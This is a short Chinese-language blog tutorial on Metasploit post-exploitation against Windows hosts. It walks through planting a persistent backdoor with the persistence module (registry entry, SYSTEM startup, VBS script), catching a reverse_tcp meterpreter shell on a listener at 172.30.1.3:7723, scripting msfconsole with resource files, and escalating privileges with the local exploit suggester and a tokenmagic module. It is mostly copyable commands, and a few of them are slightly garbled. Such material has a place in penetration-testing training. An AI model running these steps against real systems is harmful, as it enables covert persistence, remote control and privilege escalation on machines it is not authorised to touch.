Metapreter实现持续访问,自动化,提权--详细教程

别动我的cat2024-01-08 14:03

Metapreter 实现持续访问

1.先拿到目标主机的控制权限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同

2.通过options查看需要填写的参数

EXE_NAME 生成后门文件的文件名称(非必要,用默认)

PATH 后门文件的存放路径 (非必要,用默认)

REG_NAME 注册表设置的名称 (非必要,用默认)

SESSION 作用于那个会话

STARTUP 由那个用户来运行这个脚本(一般都写SYSTEM,注:这里必须大写)

VBS_NAME VBS脚本的名称 (非必要,用默认)

set SESSION 8
setg lhost 173.30.1.3

3.执行
exploit


  1. 打开kali监听模块 exploit/multi/handler
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 172.30.1.3
    set lport 7723
    exploit -j -z

-j 加入任务
-z 后台运行

Metapreter自动化

msfconsole -q -r <文件名> 启动时读取文件命令执行实现自动化

cat msfstart.txt

msfconsole -q -r msfstart.txt

这里会自动执行文件中的命令

Metapreter提权

local exploit suggester 模块(本地漏洞利用),用来做提权
search suggester

use 0
options

set session 1
exploit

可以尝试前面绿色的

use exploit exploit/windows/local/tokenmagic
options


set session 1
set LHOST 172.30.1.3
exploit
getuid

提权成功

相关推荐
ruxshui20 小时前
# Linux diff命令使用
linux·运维·服务器
Sheffield20 小时前
为什么大家都用iptables,不愿碰原生firewalld?
linux·运维·安全
何中应20 小时前
Jenkins构建完,jar包启动不起来?
linux·运维·jenkins
柏木乃一20 小时前
Linux进程信号(1):信号概述,信号产生part 1
linux·运维·服务器·c++·信号·signal
暴力求解20 小时前
Linux---进程(一):初识进程
linux·运维·服务器
香蕉你个不拿拿^20 小时前
Linux中make和makefile基本使用
linux·运维·服务器
袁袁袁袁满20 小时前
Linux怎么创建Shell脚本.sh文件
linux·运维·服务器·shell·shell脚本.sh文件·创建shell脚本·创建.sh文件
唐璜Taro21 小时前
硬核实战:内网 Windows 环境下 Jenkins + Gitee 自动化部署 Vue2 项目
gitee·自动化·jenkins
天空属于哈夫克321 小时前
企微API自动化:高效安全的群运营方案
linux·运维·服务器
dust_and_stars21 小时前
Windows 11 RDP Wrapper 配置教程与常见问题解决方法
运维·windows
热门推荐
01PHP Error: 常见错误及其解决方法02GitHub 镜像站点03Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services04HTB 赛季10 - Pterodactyl - user05爬虫逆向之观安(观镜WEB应用安全防护系统)06UV安装并设置国内源07openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南08243 行 microGPT:把“训练 + 推理”拆到骨头里09关于 nvidia-smi: no devices were found 解决方案10openclaw配置教程(linux+局域网ollama)